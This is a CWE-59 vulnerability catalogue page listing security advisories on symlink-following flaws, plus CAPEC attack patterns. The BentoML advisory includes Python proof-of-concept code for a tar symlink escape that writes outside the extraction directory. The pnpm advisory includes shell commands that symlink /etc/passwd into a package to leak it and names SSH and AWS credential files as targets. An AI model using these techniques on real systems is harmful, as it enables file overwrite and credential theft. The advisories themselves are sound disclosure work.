CWE-59
AllowedImproper Link Resolution Before File Access ('Link Following')
Abstraction: Base · Status: Draft
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.
1988 vulnerabilities reference this CWE, most recent first.
GHSA-M633-G3VP-7QW3
Vulnerability from github – Published: 2026-05-12 15:31 – Updated: 2026-05-12 15:31The consul-template library before version 0.42.0 is vulnerable to a sandbox path bypass in the file template helper that may allow reading an out-of-sandbox file. This vulnerability (CVE-2026-5061) is fixed in consul-template 0.42.0.
{
"affected": [],
"aliases": [
"CVE-2026-5061"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-12T15:16:16Z",
"severity": "MODERATE"
},
"details": "The consul-template library before version 0.42.0 is vulnerable to a sandbox path bypass in the file template helper that may allow reading an out-of-sandbox file. This vulnerability (CVE-2026-5061) is fixed in consul-template 0.42.0.",
"id": "GHSA-m633-g3vp-7qw3",
"modified": "2026-05-12T15:31:41Z",
"published": "2026-05-12T15:31:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5061"
},
{
"type": "WEB",
"url": "https://discuss.hashicorp.com/t/hcsec-2026-12-consul-template-vulnerable-to-sandbox-path-bypass-in-file-helper-through-symlink-attack/77414"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-M699-6XJ6-M4HP
Vulnerability from github – Published: 2026-03-03 18:31 – Updated: 2026-03-04 18:31An issue in the WiseDelfile64.sys component of WiseCleaner Wise Force Deleter 7.3.2 and earlier allows attackers to delete arbitrary files via a crafted request.
{
"affected": [],
"aliases": [
"CVE-2025-66680"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-03T16:16:17Z",
"severity": "HIGH"
},
"details": "An issue in the WiseDelfile64.sys component of WiseCleaner Wise Force Deleter 7.3.2 and earlier allows attackers to delete arbitrary files via a crafted request.",
"id": "GHSA-m699-6xj6-m4hp",
"modified": "2026-03-04T18:31:49Z",
"published": "2026-03-03T18:31:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66680"
},
{
"type": "WEB",
"url": "https://github.com/cwjchoi01/CVE-2025-66680/tree/main"
},
{
"type": "WEB",
"url": "https://www.wisecleaner.com/wise-force-deleter.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M6CX-G6QM-P2CX
Vulnerability from github – Published: 2019-12-13 15:39 – Updated: 2021-10-21 21:16Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It fails to prevent access to folders outside of the intended node_modules folder through the bin field. A properly constructed entry in the package.json bin field would allow a package publisher to create files on a user's system when the package is installed. It is only possible to affect files that the user running npm install has access to and it is not possible to over write files that already exist on disk.
This behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.
Recommendation
Upgrade to version 6.13.3 or later.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "npm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.13.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-16775"
],
"database_specific": {
"cwe_ids": [
"CWE-59",
"CWE-61"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-17T16:30:50Z",
"nvd_published_at": "2019-12-13T01:15:00Z",
"severity": "HIGH"
},
"details": "Versions of the npm CLI prior to 6.13.3 are vulnerable to an Arbitrary File Write. It fails to prevent access to folders outside of the intended node_modules folder through the bin field. A properly constructed entry in the package.json bin field would allow a package publisher to create files on a user\u0027s system when the package is installed. It is only possible to affect files that the user running `npm install` has access to and it is not possible to over write files that already exist on disk.\n\nThis behavior is still possible through install scripts. This vulnerability bypasses a user using the --ignore-scripts install option.\n\n\n## Recommendation\n\nUpgrade to version 6.13.3 or later.",
"id": "GHSA-m6cx-g6qm-p2cx",
"modified": "2021-10-21T21:16:09Z",
"published": "2019-12-13T15:39:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/npm/cli/security/advisories/GHSA-m6cx-g6qm-p2cx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16775"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHEA-2020:0330"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0573"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0579"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0597"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2020:0602"
},
{
"type": "WEB",
"url": "https://blog.npmjs.org/post/189618601100/binary-planting-with-the-npm-cli"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-m6cx-g6qm-p2cx"
},
{
"type": "PACKAGE",
"url": "https://github.com/npm/cli"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z36UKPO5F3PQ3Q2POMF5LEKXWAH5RUFP"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1434"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00027.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Arbitrary File Write in npm"
}
GHSA-M6GQ-7H42-3FJ9
Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09replay-sorcery-kms in Replay Sorcery 0.6.0 allows a local attacker to gain root privileges via a symlink attack on /tmp/replay-sorcery or /tmp/replay-sorcery/device.sock.
{
"affected": [],
"aliases": [
"CVE-2021-36983"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-30T14:15:00Z",
"severity": "HIGH"
},
"details": "replay-sorcery-kms in Replay Sorcery 0.6.0 allows a local attacker to gain root privileges via a symlink attack on /tmp/replay-sorcery or /tmp/replay-sorcery/device.sock.",
"id": "GHSA-m6gq-7h42-3fj9",
"modified": "2022-05-24T19:09:21Z",
"published": "2022-05-24T19:09:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36983"
},
{
"type": "WEB",
"url": "https://github.com/matanui159/ReplaySorcery/releases"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2021/07/27/1"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-M6PP-3QRG-P5X2
Vulnerability from github – Published: 2023-01-20 09:30 – Updated: 2023-01-26 21:30A vulnerability in the CLI of Cisco TelePresence CE and RoomOS Software could allow an authenticated, local attacker to overwrite arbitrary files on the local system of an affected device. This vulnerability is due to improper access controls on files that are in the local file system. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system of an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device.
{
"affected": [],
"aliases": [
"CVE-2023-20008"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-20T07:15:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in the CLI of Cisco TelePresence CE and RoomOS Software could allow an authenticated, local attacker to overwrite arbitrary files on the local system of an affected device. This vulnerability is due to improper access controls on files that are in the local file system. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system of an affected device. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device.",
"id": "GHSA-m6pp-3qrg-p5x2",
"modified": "2023-01-26T21:30:31Z",
"published": "2023-01-20T09:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20008"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-roomos-dkjGFgRK"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M6QG-CQRQ-QX4J
Vulnerability from github – Published: 2022-05-17 05:17 – Updated: 2022-05-17 05:17Centrify Deployment Manager 2.1.0.283, as distributed in Centrify Suite before 2012.5, allows local users to (1) overwrite arbitrary files via a symlink attack on the adcheckDMoutput temporary file, or (2) overwrite arbitrary files and consequently gain privileges via a symlink attack on the centrify.cmd.0 temporary file.
{
"affected": [],
"aliases": [
"CVE-2012-6348"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2013-01-04T21:55:00Z",
"severity": "LOW"
},
"details": "Centrify Deployment Manager 2.1.0.283, as distributed in Centrify Suite before 2012.5, allows local users to (1) overwrite arbitrary files via a symlink attack on the adcheckDMoutput temporary file, or (2) overwrite arbitrary files and consequently gain privileges via a symlink attack on the centrify.cmd.0 temporary file.",
"id": "GHSA-m6qg-cqrq-qx4j",
"modified": "2022-05-17T05:17:02Z",
"published": "2022-05-17T05:17:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6348"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0036.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0037.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0071.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0097.html"
},
{
"type": "WEB",
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-12/0113.html"
},
{
"type": "WEB",
"url": "http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html"
},
{
"type": "WEB",
"url": "http://vapid.dhs.org/exploits/centrify_local_r00t.c"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-M6W7-QV66-G3MF
Vulnerability from github – Published: 2026-03-03 17:46 – Updated: 2026-03-04 02:00Arbitrary File Write via Symlink Path Traversal in Tar Extraction
Summary
The safe_extract_tarfile() function validates that each tar member's path is within the destination directory, but for symlink members it only validates the symlink's own path, not the symlink's target. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.
Affected Component
- File:
src/bentoml/_internal/utils/filesystem.py:58-96 - Callers:
src/bentoml/_internal/cloud/bento.py:542,src/bentoml/_internal/cloud/model.py:504 - Affected versions: All versions with
safe_extract_tarfile()
Severity
CVSS 3.1: 8.1 (High)
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Vulnerability Details
Vulnerable Code (filesystem.py:58-96)
def safe_extract_tarfile(tar, destination):
os.makedirs(destination, exist_ok=True)
for member in tar.getmembers():
fn = member.name
path = os.path.abspath(os.path.join(destination, fn))
if not Path(path).is_relative_to(destination): # Line 64: INCOMPLETE
continue # Only checks member path, NOT symlink target
if member.issym():
tar._extract_member(member, path) # Line 75: Creates symlink with UNVALIDATED target
else:
fp = tar.extractfile(member)
with open(path, "wb") as destfp: # Line 92: open() FOLLOWS symlinks
shutil.copyfileobj(fp, destfp)
The Bug
- Line 64:
Path(path).is_relative_to(destination)checks the member's OWN path, not the symlink target - Line 75:
tar._extract_member()creates symlink with unvalidated target (e.g.,/etc) - Line 92:
open(path, "wb")follows the symlink, writing OUTSIDE the destination
os.path.abspath() does NOT resolve symlinks (only . and ..). The path check passes because the string path appears within destination, but open() follows the symlink to the actual target.
Proof of Concept
import io, os, shutil, tarfile, tempfile
from pathlib import Path
def create_malicious_tar(target_dir, target_file, payload):
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode='w:gz') as tar:
sym = tarfile.TarInfo(name='escape')
sym.type = tarfile.SYMTYPE
sym.linkname = target_dir
tar.addfile(sym)
info = tarfile.TarInfo(name=f'escape/{target_file}')
info.size = len(payload)
tar.addfile(info, io.BytesIO(payload))
buf.seek(0)
return buf
with tempfile.TemporaryDirectory() as tmpdir:
extract_dir = os.path.join(tmpdir, 'extract')
target_dir = os.path.join(tmpdir, 'outside')
os.makedirs(target_dir)
mal_tar = create_malicious_tar(target_dir, 'pwned.txt', b'PWNED')
tar = tarfile.open(fileobj=mal_tar, mode='r:gz')
# Reproduce filesystem.py:58-96
os.makedirs(extract_dir, exist_ok=True)
for member in tar.getmembers():
path = os.path.abspath(os.path.join(extract_dir, member.name))
if not Path(path).is_relative_to(extract_dir): continue
if member.issym():
tar._extract_member(member, path) # Symlink target NOT checked
else:
fp = tar.extractfile(member)
os.makedirs(os.path.dirname(path), exist_ok=True)
if fp:
with open(path, 'wb') as destfp: # Follows symlink!
shutil.copyfileobj(fp, destfp)
assert os.path.exists(os.path.join(target_dir, 'pwned.txt'))
print(open(os.path.join(target_dir, 'pwned.txt')).read()) # PWNED
Impact
1. Arbitrary file overwrite via shared bentos
BentoML users share pre-built bentos. A malicious bento can overwrite any writable file: ~/.bashrc, ~/.ssh/authorized_keys, crontabs, Python site-packages.
2. Remote code execution via file overwrite
Overwriting ~/.bashrc or Python packages achieves RCE.
3. BentoCloud deployments
safe_extract_tarfile() is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.
Remediation
Validate symlink targets:
if member.issym():
target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))
if not Path(target).is_relative_to(dest):
logger.warning('Symlink %s points outside: %s', member.name, member.linkname)
continue
Or use Python 3.12+ tar.extractall(filter='data').
References
- CWE-59: Improper Link Resolution Before File Access ('Link Following')
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "bentoml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.36"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27905"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-03T17:46:47Z",
"nvd_published_at": "2026-03-03T23:15:55Z",
"severity": "HIGH"
},
"details": "# Arbitrary File Write via Symlink Path Traversal in Tar Extraction\n\n## Summary\n\nThe `safe_extract_tarfile()` function validates that each tar member\u0027s path is within the destination directory, but for symlink members it only validates the symlink\u0027s own path, **not the symlink\u0027s target**. An attacker can create a malicious bento/model tar file containing a symlink pointing outside the extraction directory, followed by a regular file that writes through the symlink, achieving arbitrary file write on the host filesystem.\n\n## Affected Component\n\n- **File**: `src/bentoml/_internal/utils/filesystem.py:58-96`\n- **Callers**: `src/bentoml/_internal/cloud/bento.py:542`, `src/bentoml/_internal/cloud/model.py:504`\n- **Affected versions**: All versions with `safe_extract_tarfile()`\n\n## Severity\n\n**CVSS 3.1: 8.1 (High)**\n`AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H`\n\n## Vulnerability Details\n\n### Vulnerable Code (filesystem.py:58-96)\n\n```python\ndef safe_extract_tarfile(tar, destination):\n os.makedirs(destination, exist_ok=True)\n for member in tar.getmembers():\n fn = member.name\n path = os.path.abspath(os.path.join(destination, fn))\n if not Path(path).is_relative_to(destination): # Line 64: INCOMPLETE\n continue # Only checks member path, NOT symlink target\n if member.issym():\n tar._extract_member(member, path) # Line 75: Creates symlink with UNVALIDATED target\n else:\n fp = tar.extractfile(member)\n with open(path, \"wb\") as destfp: # Line 92: open() FOLLOWS symlinks\n shutil.copyfileobj(fp, destfp)\n```\n\n### The Bug\n\n1. Line 64: `Path(path).is_relative_to(destination)` checks the member\u0027s OWN path, not the symlink target\n2. Line 75: `tar._extract_member()` creates symlink with unvalidated target (e.g., `/etc`)\n3. Line 92: `open(path, \"wb\")` follows the symlink, writing OUTSIDE the destination\n\n`os.path.abspath()` does NOT resolve symlinks (only `.` and `..`). The path check passes because the string path appears within destination, but `open()` follows the symlink to the actual target.\n\n## Proof of Concept\n\n```python\nimport io, os, shutil, tarfile, tempfile\nfrom pathlib import Path\n\ndef create_malicious_tar(target_dir, target_file, payload):\n buf = io.BytesIO()\n with tarfile.open(fileobj=buf, mode=\u0027w:gz\u0027) as tar:\n sym = tarfile.TarInfo(name=\u0027escape\u0027)\n sym.type = tarfile.SYMTYPE\n sym.linkname = target_dir\n tar.addfile(sym)\n info = tarfile.TarInfo(name=f\u0027escape/{target_file}\u0027)\n info.size = len(payload)\n tar.addfile(info, io.BytesIO(payload))\n buf.seek(0)\n return buf\n\nwith tempfile.TemporaryDirectory() as tmpdir:\n extract_dir = os.path.join(tmpdir, \u0027extract\u0027)\n target_dir = os.path.join(tmpdir, \u0027outside\u0027)\n os.makedirs(target_dir)\n \n mal_tar = create_malicious_tar(target_dir, \u0027pwned.txt\u0027, b\u0027PWNED\u0027)\n tar = tarfile.open(fileobj=mal_tar, mode=\u0027r:gz\u0027)\n \n # Reproduce filesystem.py:58-96\n os.makedirs(extract_dir, exist_ok=True)\n for member in tar.getmembers():\n path = os.path.abspath(os.path.join(extract_dir, member.name))\n if not Path(path).is_relative_to(extract_dir): continue\n if member.issym():\n tar._extract_member(member, path) # Symlink target NOT checked\n else:\n fp = tar.extractfile(member)\n os.makedirs(os.path.dirname(path), exist_ok=True)\n if fp:\n with open(path, \u0027wb\u0027) as destfp: # Follows symlink!\n shutil.copyfileobj(fp, destfp)\n \n assert os.path.exists(os.path.join(target_dir, \u0027pwned.txt\u0027))\n print(open(os.path.join(target_dir, \u0027pwned.txt\u0027)).read()) # PWNED\n```\n\n## Impact\n\n### 1. Arbitrary file overwrite via shared bentos\nBentoML users share pre-built bentos. A malicious bento can overwrite any writable file: `~/.bashrc`, `~/.ssh/authorized_keys`, crontabs, Python site-packages.\n\n### 2. Remote code execution via file overwrite\nOverwriting `~/.bashrc` or Python packages achieves RCE.\n\n### 3. BentoCloud deployments\n`safe_extract_tarfile()` is called when pulling bentos from BentoCloud (bento.py:542). A malicious actor on BentoCloud can compromise any system that pulls a bento.\n\n## Remediation\n\nValidate symlink targets:\n```python\nif member.issym():\n target = os.path.normpath(os.path.join(os.path.dirname(path), member.linkname))\n if not Path(target).is_relative_to(dest):\n logger.warning(\u0027Symlink %s points outside: %s\u0027, member.name, member.linkname)\n continue\n```\n\nOr use Python 3.12+ `tar.extractall(filter=\u0027data\u0027)`.\n\n## References\n\n- CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"id": "GHSA-m6w7-qv66-g3mf",
"modified": "2026-03-04T02:00:42Z",
"published": "2026-03-03T17:46:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-m6w7-qv66-g3mf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27905"
},
{
"type": "WEB",
"url": "https://github.com/bentoml/BentoML/commit/4e0eb007765ac04c7924220d643f264715cc9670"
},
{
"type": "PACKAGE",
"url": "https://github.com/bentoml/BentoML"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "BentoML Vulnerable to Arbitrary File Write via Symlink Path Traversal in Tar Extraction"
}
GHSA-M6XP-53G9-23JP
Vulnerability from github – Published: 2025-10-14 18:30 – Updated: 2025-10-14 18:30Improper link resolution before file access ('link following') in XBox Gaming Services allows an authorized attacker to elevate privileges locally.
{
"affected": [],
"aliases": [
"CVE-2025-59281"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-14T17:16:10Z",
"severity": "HIGH"
},
"details": "Improper link resolution before file access (\u0027link following\u0027) in XBox Gaming Services allows an authorized attacker to elevate privileges locally.",
"id": "GHSA-m6xp-53g9-23jp",
"modified": "2025-10-14T18:30:36Z",
"published": "2025-10-14T18:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59281"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59281"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-M724-HQMC-GGPX
Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-21 17:03A vulnerability in the ImageClassificationDataset.from_csv() API of the dmlc/gluon-cv repository, version 0.10.0, allows for arbitrary file write. The function downloads and extracts tar.gz files from URLs without proper sanitization, making it susceptible to a TarSlip vulnerability. Attackers can exploit this by crafting malicious tar files that, when extracted, can overwrite files on the victim's system via path traversal or faked symlinks.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "gluoncv"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.10.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-12216"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-22",
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-21T17:03:33Z",
"nvd_published_at": "2025-03-20T10:15:27Z",
"severity": "HIGH"
},
"details": "A vulnerability in the `ImageClassificationDataset.from_csv()` API of the `dmlc/gluon-cv` repository, version 0.10.0, allows for arbitrary file write. The function downloads and extracts `tar.gz` files from URLs without proper sanitization, making it susceptible to a TarSlip vulnerability. Attackers can exploit this by crafting malicious tar files that, when extracted, can overwrite files on the victim\u0027s system via path traversal or faked symlinks.",
"id": "GHSA-m724-hqmc-ggpx",
"modified": "2025-03-21T17:03:33Z",
"published": "2025-03-20T12:32:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12216"
},
{
"type": "PACKAGE",
"url": "https://github.com/dmlc/gluon-cv"
},
{
"type": "WEB",
"url": "https://github.com/dmlc/gluon-cv/blob/3862e2db33ab650eff7c7c5c5891e805207027b1/gluoncv/utils/filesystem.py#L223-L229"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/46081fdc-2951-4deb-a2c9-2627007bdce0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "GluonCV Arbitrary File Write via TarSlip"
}
GHSA-M733-5W8F-5GGW
Vulnerability from github – Published: 2026-01-26 21:02 – Updated: 2026-01-29 03:23Summary
When pnpm installs a file: (directory) or git: dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., /etc/passwd, ~/.ssh/id_rsa) causes pnpm to copy that file's contents into node_modules, leaking local data.
Preconditions: Only affects file: and git: dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected.
Details
The vulnerability exists in store/cafs/src/addFilesFromDir.ts. The code uses fs.statSync() and readFileSync() which follow symlinks by default:
const absolutePath = path.join(dirname, relativePath)
const stat = fs.statSync(absolutePath) // Follows symlinks!
const buffer = fs.readFileSync(absolutePath) // Reads symlink TARGET
There is no check that absolutePath resolves to a location inside the package directory.
PoC
# Create malicious package
mkdir -p /tmp/evil && cd /tmp/evil
ln -s /etc/passwd leaked-passwd.txt
echo '{"name":"evil","version":"1.0.0","files":["*.txt"]}' > package.json
# Victim installs
mkdir /tmp/victim && cd /tmp/victim
pnpm init && pnpm add file:../evil
# Leaked!
cat node_modules/evil/leaked-passwd.txt
Impact
- Developers installing local/file dependencies
- CI/CD pipelines installing git dependencies
- Credential theft via symlinks to
~/.aws/credentials,~/.npmrc,~/.ssh/id_rsa
Suggested Fix
Use lstatSync to detect symlinks and reject those pointing outside the package root in store/cafs/src/addFilesFromDir.ts.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.28.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-24056"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-26T21:02:33Z",
"nvd_published_at": "2026-01-26T22:15:56Z",
"severity": "MODERATE"
},
"details": "### Summary\nWhen pnpm installs a `file:` (directory) or `git:` dependency, it follows symlinks and reads their target contents without constraining them to the package root. A malicious package containing a symlink to an absolute path (e.g., `/etc/passwd`, `~/.ssh/id_rsa`) causes pnpm to copy that file\u0027s contents into `node_modules`, leaking local data.\n\n**Preconditions:** Only affects `file:` and `git:` dependencies. Registry packages (npm) have symlinks stripped during publish and are NOT affected.\n\n### Details\nThe vulnerability exists in `store/cafs/src/addFilesFromDir.ts`. The code uses `fs.statSync()` and `readFileSync()` which follow symlinks by default:\n\n```typescript\nconst absolutePath = path.join(dirname, relativePath)\nconst stat = fs.statSync(absolutePath) // Follows symlinks!\nconst buffer = fs.readFileSync(absolutePath) // Reads symlink TARGET\n```\n\nThere is no check that `absolutePath` resolves to a location inside the package directory.\n\n### PoC\n```bash\n# Create malicious package\nmkdir -p /tmp/evil \u0026\u0026 cd /tmp/evil\nln -s /etc/passwd leaked-passwd.txt\necho \u0027{\"name\":\"evil\",\"version\":\"1.0.0\",\"files\":[\"*.txt\"]}\u0027 \u003e package.json\n\n# Victim installs\nmkdir /tmp/victim \u0026\u0026 cd /tmp/victim\npnpm init \u0026\u0026 pnpm add file:../evil\n\n# Leaked!\ncat node_modules/evil/leaked-passwd.txt\n```\n\n### Impact\n- Developers installing local/file dependencies\n- CI/CD pipelines installing git dependencies\n- Credential theft via symlinks to `~/.aws/credentials`, `~/.npmrc`, `~/.ssh/id_rsa`\n\n### Suggested Fix\nUse `lstatSync` to detect symlinks and reject those pointing outside the package root in `store/cafs/src/addFilesFromDir.ts`.",
"id": "GHSA-m733-5w8f-5ggw",
"modified": "2026-01-29T03:23:22Z",
"published": "2026-01-26T21:02:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-m733-5w8f-5ggw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24056"
},
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/commit/b277b45bc35ae77ca72d7634d144bbd58a48b70f"
},
{
"type": "PACKAGE",
"url": "https://github.com/pnpm/pnpm"
},
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/releases/tag/v10.28.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "pnpm has symlink traversal in file:/git dependencies"
}
Mitigation MIT-48.1
Strategy: Separation of Privilege
- Follow the principle of least privilege when assigning access rights to entities in a software system.
- Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted.
CAPEC-132: Symlink Attack
An adversary positions a symbolic link in such a manner that the targeted user or application accesses the link's endpoint, assuming that it is accessing a file with the link's name.
CAPEC-17: Using Malicious Files
An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.